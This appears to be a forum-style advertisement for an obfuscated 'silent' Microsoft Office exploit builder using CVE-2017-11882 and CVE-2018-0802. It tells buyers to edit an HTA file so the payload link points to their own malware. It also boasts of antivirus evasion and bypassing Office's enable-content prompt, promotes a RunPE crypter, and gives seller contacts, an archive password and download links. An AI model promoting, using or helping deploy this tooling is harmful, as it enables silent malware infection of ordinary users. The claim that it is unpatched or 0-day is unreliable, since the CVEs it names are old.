Silent Microsoft Office exploit

<

div style=”text-align: center;”><img class=”aligncenter size-medium” ” src=”https://image.ibb.co/jj8rdp/silent-exploits-office-exploits-opt.png” alt=”exploit” width=”2000″ height=”1047″ style=”display:none”>

Silent Microsoft Office exploit

Silent Office Exploit cve2017-11882 Obfuscation UD as vouch for all members its 7/35 now its alittle old but still good to learn from it or even can use it

If you take alook in the code you will found its completely obfuscated and this really more than you look


  1. install python higher than 2.7
  2. open HTA with notepad and replace putty link with your direct link

1.silent office exploit scantime/runtime this not like all other macro bullshit that ppl selling on HF this is cve2018-0802 + cve2017-11882 in one python builder it support all OS and till office version 2016 and earlier

Private excel its also work till 2016 and all OS the good thing in this one its bypass the enable content filter in office when file downloaded from internet

This one is not patched/0day but this is not available for sale for everyone

PS : i am also doing custom code crypter coded by delphi its real runtime crypter using RUNPE memory execution
yahoo:kbksrb@ymail.com
ICQ:653580170
jabber: bilalkhanicompk@jabber.ru

Password : adrikadi

Download Link 1

Mirror Link 2

Download Link 3